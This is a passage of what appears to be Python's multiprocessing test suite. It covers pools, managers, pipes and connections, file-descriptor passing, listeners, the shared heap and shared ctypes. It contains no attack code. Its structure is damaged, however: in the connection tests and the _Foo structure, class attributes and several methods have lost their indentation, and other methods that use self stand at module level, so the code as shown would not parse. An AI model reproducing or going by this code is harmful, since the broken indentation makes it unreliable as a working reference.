            self.assertIs(type(exc), RuntimeError)
            self.assertEqual(exc.args, (123,))
            cause = exc.__cause__
            self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
            self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
            with test.support.captured_stderr() as f1:
                try:
                    raise exc
                except RuntimeError:
                    sys.excepthook(*sys.exc_info())
            self.assertIn('raise RuntimeError(123) # some comment',
                          f1.getvalue())
            # _helper_reraises_exception should not make the error
            # a remote exception
            with self.Pool(1) as p:
                try:
                    p.map(sqr, exception_throwing_generator(1, -1), 1)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected SayWhenError')
                self.assertIs(type(exc), SayWhenError)
                self.assertIs(exc.__cause__, None)
            p.join()
    @classmethod
    def _test_wrapped_exception(cls):
        raise RuntimeError('foo')
    def test_wrapped_exception(self):
        # Issue #20980: Should not wrap exception when using thread pool
        with self.Pool(1) as p:
            with self.assertRaises(RuntimeError):
                p.apply(self._test_wrapped_exception)
        p.join()
    def test_map_no_failfast(self):
        # Issue #23992: the fail-fast behaviour when an exception is raised
        # during map() would make Pool.join() deadlock, because a worker
        # process would fill the result queue (after the result handler thread
        # terminated, hence not draining it anymore).
        t_start = time.monotonic()
        with self.assertRaises(ValueError):
            with self.Pool(2) as p:
                try:
                    p.map(raise_large_valuerror, [0, 1])
                finally:
                    time.sleep(0.5)
                    p.close()
                    p.join()
        # check that we indeed waited for all jobs
        self.assertGreater(time.monotonic() - t_start, 0.9)
    def test_release_task_refs(self):
        # Issue #29861: task arguments and results should not be kept
        # alive after we are done with them.
        objs = [CountedObject() for i in range(10)]
        refs = [weakref.ref(o) for o in objs]
        self.pool.map(identity, objs)
        del objs
        time.sleep(DELTA)  # let threaded cleanup code run
        self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned, check
        # they were released too.
        self.assertEqual(CountedObject.n_instances, 0)
def raising():
    """Always raise KeyError('key'); used to exercise pool error callbacks."""
    raise KeyError("key")
def unpickleable_result():
    """Return a lambda, which cannot be pickled for transport to the parent."""
    return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
    """Tests for how Pool reports errors raised or produced by worker tasks."""
    ALLOWED_TYPES = ('processes', )
    def test_async_error_callback(self):
        # The error_callback receives the exception raised by the task.
        p = multiprocessing.Pool(2)
        scratchpad = [None]
        def errback(exc):
            scratchpad[0] = exc
        res = p.apply_async(raising, error_callback=errback)
        self.assertRaises(KeyError, res.get)
        self.assertTrue(scratchpad[0])
        self.assertIsInstance(scratchpad[0], KeyError)
        p.close()
        p.join()
    def test_unpickleable_result(self):
        # A result that cannot be pickled surfaces as MaybeEncodingError
        # (wrapping the original exception and value) instead of hanging.
        from multiprocessing.pool import MaybeEncodingError
        p = multiprocessing.Pool(2)
        # Make sure we don't lose pool processes because of encoding errors.
        for iteration in range(20):
            scratchpad = [None]
            def errback(exc):
                scratchpad[0] = exc
            res = p.apply_async(unpickleable_result, error_callback=errback)
            self.assertRaises(MaybeEncodingError, res.get)
            wrapped = scratchpad[0]
            self.assertTrue(wrapped)
            self.assertIsInstance(scratchpad[0], MaybeEncodingError)
            self.assertIsNotNone(wrapped.exc)
            self.assertIsNotNone(wrapped.value)
        p.close()
        p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
    """Tests for Pool(maxtasksperchild=...) worker recycling."""
    ALLOWED_TYPES = ('processes', )
    def test_pool_worker_lifetime(self):
        p = multiprocessing.Pool(3, maxtasksperchild=10)
        self.assertEqual(3, len(p._pool))
        origworkerpids = [w.pid for w in p._pool]
        # Run many tasks so each worker gets replaced (hopefully)
        results = []
        for i in range(100):
            results.append(p.apply_async(sqr, (i, )))
        # Fetch the results and verify we got the right answers,
        # also ensuring all the tasks have completed.
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
        # Refill the pool
        p._repopulate_pool()
        # Wait until all workers are alive
        # (countdown * DELTA = 5 seconds max startup process time)
        countdown = 50
        while countdown and not all(w.is_alive() for w in p._pool):
            countdown -= 1
            time.sleep(DELTA)
        finalworkerpids = [w.pid for w in p._pool]
        # All pids should be assigned. See issue #7805.
        self.assertNotIn(None, origworkerpids)
        self.assertNotIn(None, finalworkerpids)
        # Finally, check that the worker pids have changed
        self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
        p.close()
        p.join()
    def test_pool_worker_lifetime_early_close(self):
        # Issue #10332: closing a pool whose workers have limited lifetimes
        # before all the tasks completed would make join() hang.
        p = multiprocessing.Pool(3, maxtasksperchild=1)
        results = []
        for i in range(6):
            results.append(p.apply_async(sqr, (i, 0.3)))
        p.close()
        p.join()
        # check the results
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
    """Helper with a normal method, a raising method and a 'private' one,
    used to exercise which methods a manager proxy exposes."""
    def f(self):
        return 'f()'
    def g(self):
        raise ValueError
    def _h(self):
        return '_h()'
def baz():
    """Generator yielding the squares of 0 through 9."""
    for n in range(10):
        yield n * n
class IteratorProxy(BaseProxy):
    """Proxy that forwards iteration to a remote iterator via __next__."""
    _exposed_ = ('__next__',)
    def __iter__(self):
        return self
    def __next__(self):
        return self._callmethod('__next__')
class MyManager(BaseManager):
    """Custom manager exposing FooBar instances and the baz generator."""
    pass
# 'Foo' exposes FooBar's public methods only; 'Bar' explicitly exposes the
# private _h too; 'baz' returns an iterator through a custom proxy type.
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
    """Tests for the customized BaseManager subclass defined above."""
    ALLOWED_TYPES = ('manager',)
    def test_mymanager(self):
        manager = MyManager()
        manager.start()
        self.common(manager)
        manager.shutdown()
        # If the manager process exited cleanly then the exitcode
        # will be zero. Otherwise (after a short timeout)
        # terminate() is used, resulting in an exitcode of -SIGTERM.
        self.assertEqual(manager._process.exitcode, 0)
    def test_mymanager_context(self):
        with MyManager() as manager:
            self.common(manager)
        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
    def test_mymanager_context_prestarted(self):
        manager = MyManager()
        manager.start()
        with manager:
            self.common(manager)
        self.assertEqual(manager._process.exitcode, 0)
    def common(self, manager):
        # Exercise the proxies: only registered/exposed methods are
        # available, non-exposed ones fail with RemoteError, and the
        # iterator proxy supports iteration.
        foo = manager.Foo()
        bar = manager.Bar()
        baz = manager.baz()
        foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
        bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
        self.assertEqual(foo_methods, ['f', 'g'])
        self.assertEqual(bar_methods, ['f', '_h'])
        self.assertEqual(foo.f(), 'f()')
        self.assertRaises(ValueError, foo.g)
        self.assertEqual(foo._callmethod('f'), 'f()')
        self.assertRaises(RemoteError, foo._callmethod, '_h')
        self.assertEqual(bar.f(), 'f()')
        self.assertEqual(bar._h(), '_h()')
        self.assertEqual(bar._callmethod('f'), 'f()')
        self.assertEqual(bar._callmethod('_h'), '_h()')
        self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
# Module-level queue served to remote manager clients via get_queue().
_queue = pyqueue.Queue()
def get_queue():
    """Return the module-level queue shared with manager clients."""
    return _queue
class QueueManager(BaseManager):
    '''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
    '''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
# Serializer used by the remote-manager tests below; xmlrpclib cannot
# serialize arbitrary objects, which test_remote deliberately relies on.
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
    """Test connecting to a manager server using xmlrpclib serialization."""
    ALLOWED_TYPES = ('manager',)
    values = ['hello world', None, True, 2.25,
              'hall\xe5 v\xe4rlden',
              '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
              b'hall\xe5 v\xe4rlden',
             ]
    result = values[:]
    @classmethod
    def _putter(cls, address, authkey):
        # Child: connect with the interface-only manager class and enqueue
        # the test values.
        manager = QueueManager2(
            address=address, authkey=authkey, serializer=SERIALIZER
            )
        manager.connect()
        queue = manager.get_queue()
        # Note that xmlrpclib will deserialize object as a list not a tuple
        queue.put(tuple(cls.values))
    def test_remote(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
            )
        manager.start()
        self.addCleanup(manager.shutdown)
        p = self.Process(target=self._putter, args=(manager.address, authkey))
        p.daemon = True
        p.start()
        manager2 = QueueManager2(
            address=manager.address, authkey=authkey, serializer=SERIALIZER
            )
        manager2.connect()
        queue = manager2.get_queue()
        self.assertEqual(queue.get(), self.result)
        # Because we are using xmlrpclib for serialization instead of
        # pickle this will cause a serialization error.
        self.assertRaises(Exception, queue.put, time.sleep)
        # Make queue finalizer run before the server is stopped
        del queue
class _TestManagerRestart(BaseTestCase):
    """Test that a manager's address can be reused right after shutdown."""
    @classmethod
    def _putter(cls, address, authkey):
        # Child: connect to the server and enqueue a greeting.
        manager = QueueManager(
            address=address, authkey=authkey, serializer=SERIALIZER)
        manager.connect()
        queue = manager.get_queue()
        queue.put('hello world')
    def test_rapid_restart(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
        try:
            srvr = manager.get_server()
            addr = srvr.address
            # Close the connection.Listener socket which gets opened as a part
            # of manager.get_server(). It's not needed for the test.
            srvr.listener.close()
            manager.start()
            p = self.Process(target=self._putter, args=(manager.address, authkey))
            p.start()
            p.join()
            queue = manager.get_queue()
            self.assertEqual(queue.get(), 'hello world')
            del queue
        finally:
            if hasattr(manager, "shutdown"):
                manager.shutdown()
        # Rebind a fresh manager to the same address immediately.
        manager = QueueManager(
            address=addr, authkey=authkey, serializer=SERIALIZER)
        try:
            manager.start()
            self.addCleanup(manager.shutdown)
        except OSError as e:
            if e.errno != errno.EADDRINUSE:
                raise
            # Retry after some time, in case the old socket was lingering
            # (sporadic failure on buildbots)
            time.sleep(1.0)
            manager = QueueManager(
                address=addr, authkey=authkey, serializer=SERIALIZER)
            if hasattr(manager, "shutdown"):
                self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
    @classmethod
    def _echo(cls, conn):
        """Child: echo byte messages back until SENTINEL (b'') is received."""
        for msg in iter(conn.recv_bytes, SENTINEL):
            conn.send_bytes(msg)
        conn.close()
    def test_connection(self):
        """End-to-end checks of a Connection against an echoing child:
        object and byte send/recv, recv_bytes_into, poll timeouts, very
        large messages, and EOF behaviour after the peer closes."""
        conn, child_conn = self.Pipe()
        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()
        seq = [1, 2.25, None]
        msg = latin('hello world')
        longmsg = msg * 10
        arr = array.array('i', list(range(4)))
        if self.TYPE == 'processes':
            self.assertEqual(type(conn.fileno()), int)
        self.assertEqual(conn.send(seq), None)
        self.assertEqual(conn.recv(), seq)
        self.assertEqual(conn.send_bytes(msg), None)
        self.assertEqual(conn.recv_bytes(), msg)
        if self.TYPE == 'processes':
            # recv_bytes_into fills the buffer in place and returns the
            # number of bytes received; an optional offset shifts the write.
            buffer = array.array('i', [0]*10)
            expected = list(arr) + [0] * (10 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)
            buffer = array.array('i', [0]*10)
            expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)
            # A too-small buffer raises BufferTooShort carrying the message.
            buffer = bytearray(latin(' ' * 40))
            self.assertEqual(conn.send_bytes(longmsg), None)
            try:
                res = conn.recv_bytes_into(buffer)
            except multiprocessing.BufferTooShort as e:
                self.assertEqual(e.args, (longmsg,))
            else:
                self.fail('expected BufferTooShort, got %s' % res)
        poll = TimingWrapper(conn.poll)
        self.assertEqual(poll(), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(poll(-1), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(poll(TIMEOUT1), False)
        self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
        conn.send(None)
        time.sleep(.1)
        self.assertEqual(poll(TIMEOUT1), True)
        self.assertTimingAlmostEqual(poll.elapsed, 0)
        self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16Mb
        conn.send_bytes(really_big_msg)
        self.assertEqual(conn.recv_bytes(), really_big_msg)
        conn.send_bytes(SENTINEL)  # tell child to quit
        child_conn.close()
        if self.TYPE == 'processes':
            self.assertEqual(conn.readable, True)
            self.assertEqual(conn.writable, True)
            self.assertRaises(EOFError, conn.recv)
            self.assertRaises(EOFError, conn.recv_bytes)
        p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
    def test_spawn_close(self):
        # We test that a pipe connection can be closed by parent
        # process immediately after child is spawned. On Windows this
        # would have sometimes failed on old versions because
        # child_conn would be closed before the child got a chance to
        # duplicate it.
        conn, child_conn = self.Pipe()
        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()  # this might complete before child initializes
        msg = latin('hello')
        conn.send_bytes(msg)
        # The echo still works, proving the child kept its own handle.
        self.assertEqual(conn.recv_bytes(), msg)
        conn.send_bytes(SENTINEL)
        conn.close()
        p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
    @classmethod
    def _writefd(cls, conn, data, create_dummy_fds=False):
        """Child: receive a file descriptor over *conn* and write *data* to it.

        With create_dummy_fds, first occupy every unassigned fd below 256 so
        the received descriptor is forced above 256 (see issue #11657).
        """
        if create_dummy_fds:
            for i in range(0, 256):
                if not cls._is_fd_assigned(i):
                    os.dup2(conn.fileno(), i)
        fd = reduction.recv_handle(conn)
        if msvcrt:
            # On Windows the received value is an OS handle, not a C fd.
            fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
        os.write(fd, data)
        os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
    """A descriptor sent with reduction.send_handle() is usable in the
    child: the child writes b"foo" through it into TESTFN."""
    if self.TYPE != 'processes':
        self.skipTest("only makes sense with processes")
    conn, child_conn = self.Pipe(duplex=True)

    p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
    p.daemon = True
    p.start()
    self.addCleanup(test.support.unlink, test.support.TESTFN)
    with open(test.support.TESTFN, "wb") as f:
        fd = f.fileno()
        if msvcrt:
            # Windows transfers OS handles, not C runtime fds
            fd = msvcrt.get_osfhandle(fd)
        reduction.send_handle(conn, fd, p.pid)
    p.join()
    with open(test.support.TESTFN, "rb") as f:
        self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
                 "test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
                 "largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
                     "test needs os.dup2()")
def test_large_fd_transfer(self):
    # With fd > 256 (issue #11657)
    if self.TYPE != 'processes':
        self.skipTest("only makes sense with processes")
    conn, child_conn = self.Pipe(duplex=True)

    # the child fills fds < 256 first so the transferred fd lands high
    p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
    p.daemon = True
    p.start()
    self.addCleanup(test.support.unlink, test.support.TESTFN)
    with open(test.support.TESTFN, "wb") as f:
        fd = f.fileno()
        # find a free descriptor number above 256 in this process
        for newfd in range(256, MAXFD):
            if not self._is_fd_assigned(newfd):
                break
        else:
            self.fail("could not find an unassigned large file descriptor")
        os.dup2(fd, newfd)
        try:
            reduction.send_handle(conn, newfd, p.pid)
        finally:
            os.close(newfd)
    p.join()
    with open(test.support.TESTFN, "rb") as f:
        self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
    # Check that exception is raised when received data is not
    # accompanied by a file descriptor in ancillary data.
    if self.TYPE != 'processes':
        self.skipTest("only makes sense with processes")
    conn, child_conn = self.Pipe(duplex=True)

    p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
    p.daemon = True
    p.start()
    self.assertRaises(RuntimeError, reduction.recv_handle, conn)
    p.join()
def test_context(self):
    """Connections work as context managers: open inside the block,
    closed (recv raising OSError) after it, for the raw 'processes'
    connection type."""
    a, b = self.Pipe()

    with a, b:
        a.send(1729)
        self.assertEqual(b.recv(), 1729)
        if self.TYPE == 'processes':
            self.assertFalse(a.closed)
            self.assertFalse(b.closed)

    if self.TYPE == 'processes':
        self.assertTrue(a.closed)
        self.assertTrue(b.closed)
        self.assertRaises(OSError, a.recv)
        self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
    """Tests for multiprocessing.connection.Listener basics."""

    ALLOWED_TYPES = ('processes',)

    def test_multiple_bind(self):
        # Binding a second Listener to an address already in use fails.
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            self.addCleanup(l.close)
            self.assertRaises(OSError, self.connection.Listener,
                              l.address, family)

    def test_context(self):
        """Listener, Client and accepted connection all work as context
        managers; accept() on a closed listener raises OSError."""
        with self.connection.Listener() as l:
            with self.connection.Client(l.address) as c:
                with l.accept() as d:
                    c.send(1729)
                    self.assertEqual(d.recv(), 1729)

        if self.TYPE == 'processes':
            self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
    """Tests pairing a Listener with Client connections from a child."""

    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _test(cls, address):
        # Child: connect to *address*, send one message and disconnect.
        conn = cls.connection.Client(address)
        conn.send('hello')
        conn.close()

    def test_listener_client(self):
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            p = self.Process(target=self._test, args=(l.address,))
            p.daemon = True
            p.start()
            conn = l.accept()
            self.assertEqual(conn.recv(), 'hello')
            p.join()
            l.close()

    def test_issue14725(self):
        l = self.connection.Listener()
        p = self.Process(target=self._test, args=(l.address,))
        p.daemon = True
        p.start()
        time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle by now.  This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
        conn = l.accept()
        self.assertEqual(conn.recv(), 'hello')
        conn.close()
        p.join()
        l.close()

    def test_issue16955(self):
        # poll() on the client end must see the bytes the server sent
        # (issue 16955)
        for fam in self.connection.families:
            l = self.connection.Listener(family=fam)
            c = self.connection.Client(l.address)
            a = l.accept()
            a.send_bytes(b"hello")
            self.assertTrue(c.poll(1))
            a.close()
            c.close()
            l.close()
class _TestPoll(BaseTestCase):
    """Tests for Connection.poll() semantics."""

    ALLOWED_TYPES = ('processes', 'threads')

    def test_empty_string(self):
        # an empty message still makes poll() return True
        a, b = self.Pipe()
        self.assertEqual(a.poll(), False)
        b.send_bytes(b'')
        self.assertEqual(a.poll(), True)
        self.assertEqual(a.poll(), True)

    @classmethod
    def _child_strings(cls, conn, strings):
        # Child: send each string with a small delay between them.
        for s in strings:
            time.sleep(0.1)
            conn.send_bytes(s)
        conn.close()

    def test_strings(self):
        """Messages arrive intact and in order when polled for."""
        strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
        a, b = self.Pipe()
        p = self.Process(target=self._child_strings, args=(b, strings))
        p.start()

        for s in strings:
            # poll repeatedly (up to ~2s) until the next message arrives
            for i in range(200):
                if a.poll(0.01):
                    break
            x = a.recv_bytes()
            self.assertEqual(s, x)

        p.join()

    @classmethod
    def _child_boundaries(cls, r):
        # Polling may "pull" a message in to the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
        r.poll(5)

    def test_boundaries(self):
        r, w = self.Pipe(False)
        p = self.Process(target=self._child_boundaries, args=(r,))
        p.start()
        time.sleep(2)
        L = [b"first", b"second"]
        for obj in L:
            w.send_bytes(obj)
        w.close()
        p.join()
        # whichever message is left must still be a complete one
        self.assertIn(r.recv_bytes(), L)

    @classmethod
    def _child_dont_merge(cls, b):
        b.send_bytes(b'a')
        b.send_bytes(b'b')
        b.send_bytes(b'cd')

    def test_dont_merge(self):
        """Separate send_bytes() calls never merge into one message."""
        a, b = self.Pipe()
        self.assertEqual(a.poll(0.0), False)
        self.assertEqual(a.poll(0.1), False)

        p = self.Process(target=self._child_dont_merge, args=(b,))
        p.start()

        self.assertEqual(a.recv_bytes(), b'a')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.recv_bytes(), b'b')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(0.0), True)
        self.assertEqual(a.recv_bytes(), b'cd')

        p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
    """Test sending connection and socket objects between processes."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def tearDownClass(cls):
        # Stop the background resource sharer so it does not outlive
        # the tests.
        from multiprocessing import resource_sharer
        resource_sharer.stop(timeout=TIMEOUT)

    @classmethod
    def _listener(cls, conn, families):
        """Child: for each family, create a listener, publish its
        address over *conn*, and ship the accepted connection back to
        the parent; then repeat once with a plain socket."""
        for fam in families:
            l = cls.connection.Listener(family=fam)
            conn.send(l.address)
            new_conn = l.accept()
            conn.send(new_conn)
            new_conn.close()
            l.close()

        l = socket.socket()
        l.bind((test.support.HOST, 0))
        l.listen()
        conn.send(l.getsockname())
        new_conn, addr = l.accept()
        conn.send(new_conn)
        new_conn.close()
        l.close()

        conn.recv()  # block until the parent signals completion

    @classmethod
    def _remote(cls, conn):
        """Child: connect to each (address, msg) received over *conn*
        and send the message upper-cased; finish with one plain-socket
        round after the None sentinel."""
        for (address, msg) in iter(conn.recv, None):
            client = cls.connection.Client(address)
            client.send(msg.upper())
            client.close()

        address, msg = conn.recv()
        client = socket.socket()
        client.connect(address)
        client.sendall(msg.upper())
        client.close()

        conn.close()

    def test_pickling(self):
        """Connections accepted in one child can be pickled to the
        parent and used to receive data produced by another child."""
        families = self.connection.families

        lconn, lconn0 = self.Pipe()
        lp = self.Process(target=self._listener, args=(lconn0, families))
        lp.daemon = True
        lp.start()
        lconn0.close()

        rconn, rconn0 = self.Pipe()
        rp = self.Process(target=self._remote, args=(rconn0,))
        rp.daemon = True
        rp.start()
        rconn0.close()

        for fam in families:
            msg = ('This connection uses family %s' % fam).encode('ascii')
            address = lconn.recv()
            rconn.send((address, msg))
            new_conn = lconn.recv()
            self.assertEqual(new_conn.recv(), msg.upper())

        rconn.send(None)  # tell _remote to switch to the socket phase

        msg = latin('This connection uses a normal socket')
        address = lconn.recv()
        rconn.send((address, msg))
        new_conn = lconn.recv()
        buf = []
        while True:
            s = new_conn.recv(100)
            if not s:
                break
            buf.append(s)
        buf = b''.join(buf)
        self.assertEqual(buf, msg.upper())
        new_conn.close()

        lconn.send(None)  # let _listener finish

        rconn.close()
        lconn.close()

        lp.join()
        rp.join()

    @classmethod
    def child_access(cls, conn):
        """Child: use a write end then a read end received over *conn*,
        echoing the read message doubled."""
        w = conn.recv()
        w.send('all is well')
        w.close()

        r = conn.recv()
        msg = r.recv()
        conn.send(msg*2)

        conn.close()

    def test_access(self):
        # On Windows, if we do not specify a destination pid when
        # using DupHandle then we need to be careful to use the
        # correct access flags for DuplicateHandle(), or else
        # DupHandle.detach() will raise PermissionError.  For example,
        # for a read only pipe handle we should use
        # access=FILE_GENERIC_READ.  (Unfortunately
        # DUPLICATE_SAME_ACCESS does not work.)
        conn, child_conn = self.Pipe()
        p = self.Process(target=self.child_access, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()

        r, w = self.Pipe(duplex=False)
        conn.send(w)
        w.close()
        self.assertEqual(r.recv(), 'all is well')
        r.close()

        r, w = self.Pipe(duplex=False)
        conn.send(r)
        r.close()
        w.send('foobar')
        w.close()
        self.assertEqual(conn.recv(), 'foobar'*2)

        p.join()
#
#
#
class _TestHeap(BaseTestCase):
    """Tests for the multiprocessing.heap block allocator."""

    ALLOWED_TYPES = ('processes',)

    def test_heap(self):
        """Allocate and free many random-sized blocks, then verify the
        heap's free and occupied block lists describe non-overlapping,
        exactly-abutting regions."""
        iterations = 5000
        maxblocks = 50
        blocks = []

        # create and destroy lots of blocks of different sizes
        for i in range(iterations):
            size = int(random.lognormvariate(0, 1) * 1000)
            b = multiprocessing.heap.BufferWrapper(size)
            blocks.append(b)
            if len(blocks) > maxblocks:
                i = random.randrange(maxblocks)
                del blocks[i]

        # get the heap object
        heap = multiprocessing.heap.BufferWrapper._heap

        # verify the state of the heap
        all = []
        occupied = 0
        heap._lock.acquire()
        self.addCleanup(heap._lock.release)
        # collect every free block: (arena index, start, stop, len, tag)
        for L in list(heap._len_to_seq.values()):
            for arena, start, stop in L:
                all.append((heap._arenas.index(arena), start, stop,
                            stop-start, 'free'))
        # collect every allocated block the same way
        for arena, start, stop in heap._allocated_blocks:
            all.append((heap._arenas.index(arena), start, stop,
                        stop-start, 'occupied'))
            occupied += (stop-start)

        all.sort()

        for i in range(len(all)-1):
            (arena, start, stop) = all[i][:3]
            (narena, nstart, nstop) = all[i+1][:3]
            # adjacent entries either begin a new arena (offset 0) or
            # abut exactly with no gap and no overlap
            self.assertTrue((arena != narena and nstart == 0) or
                            (stop == nstart))

    def test_free_from_gc(self):
        # Check that freeing of blocks by the garbage collector doesn't deadlock
        # (issue #12352).
        # Make sure the GC is enabled, and set lower collection thresholds to
        # make collections more frequent (and increase the probability of
        # deadlock).
        if not gc.isenabled():
            gc.enable()
            self.addCleanup(gc.disable)
        thresholds = gc.get_threshold()
        self.addCleanup(gc.set_threshold, *thresholds)
        gc.set_threshold(10)

        # perform numerous block allocations, with cyclic references to make
        # sure objects are collected asynchronously by the gc
        for i in range(5000):
            a = multiprocessing.heap.BufferWrapper(1)
            b = multiprocessing.heap.BufferWrapper(1)
            # circular references
            a.buddy = b
            b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
    """Tests for multiprocessing.sharedctypes Value/Array objects."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _double(cls, x, y, z, foo, arr, string):
        # Child: double every shared value in place.
        x.value *= 2
        y.value *= 2
        z.value *= 2
        foo.x *= 2
        foo.y *= 2
        string.value *= 2
        for i in range(len(arr)):
            arr[i] *= 2

    def test_sharedctypes(self, lock=False):
        """Mutations made by a child through shared ctypes objects are
        visible in the parent after join()."""
        x = Value('i', 7, lock=lock)
        y = Value(c_double, 1.0/3.0, lock=lock)
        z = Value(c_longlong, 2 ** 33, lock=lock)
        foo = Value(_Foo, 3, 2, lock=lock)
        arr = self.Array('d', list(range(10)), lock=lock)
        string = self.Array('c', 20, lock=lock)
        string.value = latin('hello')

        p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(x.value, 14)
        self.assertAlmostEqual(y.value, 2.0/3.0)
        self.assertEqual(z.value, 2 ** 34)
        self.assertEqual(foo.x, 6)
        self.assertAlmostEqual(foo.y, 4.0)
        for i in range(10):
            self.assertAlmostEqual(arr[i], i*2)
        self.assertEqual(string.value, latin('hellohello'))

    def test_synchronize(self):
        # same checks but with lock-wrapped shared objects
        self.test_sharedctypes(lock=True)

    def test_copy(self):
